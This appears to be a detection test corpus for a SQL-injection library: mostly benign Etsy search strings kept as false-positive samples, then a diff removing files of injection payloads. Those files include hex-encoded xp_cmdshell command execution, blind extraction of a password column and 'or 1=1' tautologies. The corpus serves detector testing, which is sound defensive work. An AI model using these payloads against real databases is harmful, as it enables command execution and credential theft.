LED -(ZEPPELIN)
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
70" ROUND TABLE CLOTH
"CASE"
"RIGHT ON"
"NOT ALL WHO WANDER"
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
CAT2_GALLERY_20">ETSY</A
OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
ALLENTOWN, () PA UNITED STATES
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
GREEN...GREEN...GREENISH))) BY JULIA
BRIDAL SHOWER INVITATION RECIPE CARDS'===
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
7/" ALUMINUM DISC
"MOD" "KITCHEN"
'M M L"\\ INITIALS
I' IS NOT A PLASTIC BAG
;EACH
;ON
IPHONE CASE 4 CASE
LAPTOP CASE 13 AND PHONE
IPAD -4 CASE
EP-2 CASE
ECID=15&
"///
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
2012 WRITE ON CALENDAR
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
MACBOOK CASE 13 -IPHONE -IPAD
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
LAPTOP CASE 14&#39;
"UNIQUE" PRINTABLE WEDDING
SILVER BRACELET "FORCE"
MOVIN' ON T-SHIRT
77921690/TURQUOISE-NATURAL-TU
"WRITE" DESIGN
"WHERE'S GEORGE"
"UNIQUE" PRINTABLE WEDDING
"UNION" BY ROBERT F
"TABLE"
"TRUE"
"ON" WHITE GREEN
"CREATE" STERLING GOLD
"CHANGE" NECKLACE
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
TAN (WATER RESISTANT INSULATED) MESSENGER
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
1/4"-1/2" WIDE RIBBON
1/4"-1" WIDE RIBBON
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
'-"8 TRACK" PLAYER
"AND WHEN THE KIDS ARE OLD ENOUGH"
"AND WHEN THE KIDS ARE OLD
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
"WOOD" AND "SIGN" AND "POLKA DOTS"
TAN
INFINITY LOOP SCARF
INFINITY LOOP
7 DEC 01
CARDS @ TWITTER
1;1;1;CONTROL;0;0;1;
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
7 AND A HALF
1060 OR 70S
18 CREATE GOLD
2 LOOP CONNECTORS
7 AND HALF
8 LOOP BOW
8 OR 9 WLV
00 AND 3
10.00 AND UNDER
102 TABLE CLOTH
10 OR LESS
TRUE-CUT
1.25 READ BUTTONS
"ON SALE ON SALE"
(NEW AND UNIQUE)
NEW AND UNIQUE)
1 REAL FEATHER AND 1 PETITE REAL SHELL
(DICKEY DICKIE*)
(1297-MR)
1297-MR),
(BRASS) PEN -BULLET
(CERAMIC OR POTTERY) MUGS
3/4 FEAR AND LOATHING
1 FEAR AND LOATHING
9/16 PLUGS AND TUNNELS
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
"RETURN ADDRESS LABELS" STICKER
"ON THE WAY"
"ON THE AIR" SIGN
20 SET 3/4
20 SET 3
"CREATE A CRITTER"
"INTO THE WILD"
"ON FIRE FOR" WHITE GREEN
"FOR BETTER OR WORSE"
(ANTIQUE, VINTAGE) QUILT
ANTIQUE, VINTAGE) QUILT
(TRUMPTON, IVOR, CLANGERS, POOH)
TRUMPTON, IVOR, CLANGERS, POOH)
OR-9-9WYTCZT313XRCN2UV62MBE1
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
BLAH <A HREF="FOO.HTML">FOO</A>
BLAH <A HREF="/FOO.HTML">FOO</A>
RSCHMIDT @FPMC-WILLMAR/COM
XSERVING"; ";PLATTER"; ";VINTAGE";
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
1.5 WITH 1/2 INCH LOOP END LOBSTER
60;S MOD DRESSES
7" #2 CIRCULAR NEEDLE
9/PLUGS AND TUNNELS
9/16PLUGS AND TUNNELS
"NOT ON FACEBOOK"
"#2 MOM"
80%25 ACRYLIC AND 20%25 WOOL
35%25 COTTON AND 65%25 POLYESTER.
5685587||ORDER=||SECTION_ID=||PAGE=2
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
BAMBOO CHARCOAL SOAP 1 '#
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
BOOKMAR';[K]]
WOOL AND ACRYLIC FOR SOFTNESS
01/DEC/2011:20:45:25
0;1;0;1;0
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
WOMEN';S ART DEC
DO OR NOT DO, THERE IS NO
ABC AND 123 WALL DEC
1.5 WITH 1/2 INCH LOOP END
"NOT FOR SALE"
"IS" STAMP
"LIKE" STAMP
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
1950' AND 60'S WOMEN'S COATS WITH FAKE
FOO; BAR 1+2+3
WO;DCAT[JPTPGRA][
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
0=[]'
"AS FOR ME AND MY
"EXIT, PURSUED B
"EXIT, PURSUED BY
4%27%2BX%2B4%27%2BWOOD
48%22%2BX%2B48%22%2BMODERN%2BART
90-%2B6%2BINCH
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
%22MOD%22%20%22
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
DO%20OR%20NOT%20DO
DO%20OR%20NOT%20DO%2C
9%216%2BEARINGS
%22NOT+GAY+AS+I
%22+-+%22MAGAZINE%22
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
%27-%228
%27-%228%20TRACK%22
%27-%228%20TRACK%20PL
2%20got%20%40AOL.COM
L%3BIN%20TABLE%20RUNNER
OW%3BCAST%20IRON%20TRIVETS
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
SET%208%20-MINI%20AS
1/4%22-1/2RIBBON
1/4%22-1/RIBBON
PHILLIPKEEGAN-777-%40HOTMAIL.COM
AUG%2B15%2BKEYS
%22foo%22+AND+%22bar%22+AND
%22foo%22+AND+%22bar%22
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
FOO+BAR%27%23+BLAH
5%2F8%2BLOOP
CONNECTORS+%2B+2-PRONG
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
%2BIPHONE%2B4%2BCASE
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
THING%2B1%2BAND%2BTHING%2B2
1Q9D819XMTILZVG1BOBY27-4-ROW
NOT+AS+SAD+AS+I+USED+TO+BE
NOT+AS+SAD+AS+I
IPHONE%2B4%2BCASE%2BRUSSIAN
COPPER%2B20%2BROUND
CASE+FOR+KINDLE+WITH+KEYBOARD
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
BIRTHDAY%2B12%2BMONTH%2B
6R2OS3JNSM-48-IN-0ZENVYLUJJL
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
GALLERY%3D1%3D5
I+%3C3+%3C3
I+%3C3+%3C3+THE+DOCTOR
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
-3-B39RBBO58YMVIHEVAUZBS-6TF
.75+%22+X+1.5%22
"SIGNAL LOCK"
3 TABLE LAMP WITH FLOWERS
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
1950 UNION MADE
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
SHELL IS 65 AND 35 POLY COTTON BLEND
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
5EOR-5MDKFIKK50HAHCPYPUVLG-2
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
5683190/TARGET="_BLANK"
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
# some base64 things?
zzh7W_krs4jSNwVV2TssQsSbOj--
1611-IioXXIG1ti8rspL2vbXFy--
1611/IioXXIG1ti8rspL2vbXFy--
Mosaic "Table top"
# Used in HTTP headers, e.g. Accept: */*
*/*
"Dr. Who" and coffee
"rose gold" necklace 14
"flagging" -american -festive --peace -prayer -america -stripes -straws
shabby "and white
"3 1'/3
"*"
necklace length 16" or 18"
4 pcs- (5003-BK) 14mm Black
"Keys"
"dec"
'countdown calendar" and "disney:
1950 or 1960
black and "shower curtain"
dad and keychain and "loved by"
if all else fails call grandma
case 13"
12.5 x 12.5&quot;
O'connors UNION selected a few friendsf from a
O'connors UNION selected a few friendsf from
O'connors UNION selected a few friendsf fr
O' UNION selected a few friends
O'connors UNION selected a few friends
1 I like having true friends
I like having true friends
I having true friends
I was having true friends
1 having
"1--"
'1--'
"1--
'1--
1 collate these union documents
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
# from https://github.com/client9/libinjection/issues/49
1,(1)
Toronto, ON, Canada - (YYZ)
1,1--
(1)-x
1 function (1)
'/1x-
# technically x OR 1
#x|x||1
select 'and'
x/void(1)
select x from y where
x/*
1x(((
1),(1
x, @x, @x
#
1; exec will create the case 7
`
1234`
junk <a href="../">foo.com</a>
# bogus
1alert(1)
foo 'null' bar
User(foo),junk
User(login_name),Images(url_170x135)
mr and mrs table sign
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
foo or bar add 1
Apt is gated; call when you get here, and we'll come down to get it.
DaVi - Open and Close Your Blinds With Your Phone!
Foo and 80&#039;s Foo / Bar
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
Same as reward #1 however
foobar sent you 1 message about
4.7" & iPhone 6 Plus 5.5
Family and friends having meal outdoors
<table width="99%" border="0" cellpadding="1"'
8-bit Limit (BRK)
3rd space(s)
Ink and White Out 2 in 1 Pen
Reality check (2016)
Please select pair #1


@ -1,30 +0,0 @@
# https://twitter.com/ru_raz0r/status/750311113435283456
#
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
username'declare @s varchar (8000); ...
username'DECLARE @find varchar(30) = 'Man%'
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--


@ -1,11 +0,0 @@
# Not sure of original source
# attributed to David Litchfield
#
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
# overflow
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29


@ -1,73 +0,0 @@
# samples
# unlikely to execute correctly
# probably just generated automatically without regard for usefulness
# but seen in wild "FIELD AND NUM=NUM"
# FAILS
#"1*HOPE AND 8=3",
#"0+HOPE AND 8=3",
#"0+(HOPE) AND 8=3",
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
# RHS variations
HOPE+AND+8%3D3
HOPE+AND+-8%3D3
HOPE+AND+-8%3D-3
HOPE+AND+%28-8%29%3D%28-3%29
HOPE+AND+%288%29%3D3
HOPE+AND+8%3D%283%29
HOPE+AND+%288%29%3D%283%29
HOPE+AND+1%2B2%3D3%2B4
HOPE+AND+COS%283%29%3DSIN%284%29
# lhs work arounds
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
%28HOPE%29+AND+8%3D3
%28HOPE%29%2A1+AND+8%3D3
%28HOPE%29%2B0+AND+8%3D3
1%2A%28HOPE%29+AND+8%3D3
%281%29%2A%28HOPE%29+AND+8%3D3
%281%29%2AHOPE+AND+8%3D3
%28%281%29%29%2AHOPE+AND+8%3D3
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
# based on NUM AND 1=1--
PI%28%29+AND+COS%28PI%28%29%29%3D-1
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
-9-%282%29+OR+1+%3D+1
8-9+OR+1+%3D+1
-9-%282%29+OR+1+%3D+1
-9-%28%282%29%29+OR+1+%3D+1
-9-%28%28%282%29%29%29+OR+1+%3D+1
%7E9-%282%29+OR+1+%3D+%7E1
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
dingberry%27%271%27+and+%28false%29--
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
1%27%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1234%27%27z%27+and+%283%3Dpi%28%29%29--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--


@ -1,15 +0,0 @@
#
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
999999 or 1=1 or 1=1
' or 1=1 or '1'='1
" or 1=1 or "1"="1
999999) or 1=1 or (1=1
') or 1=1 or ('1'='1
") or 1=1 or ("1"="1
999999)) or 1=1 or ((1=1
')) or 1=1 or (('1'='1
")) or 1=1 or (("1"="1
999999))) or 1=1 or (((1
'))) or 1=1 or ((('1'='1
"))) or 1=1 or ((("1"="1


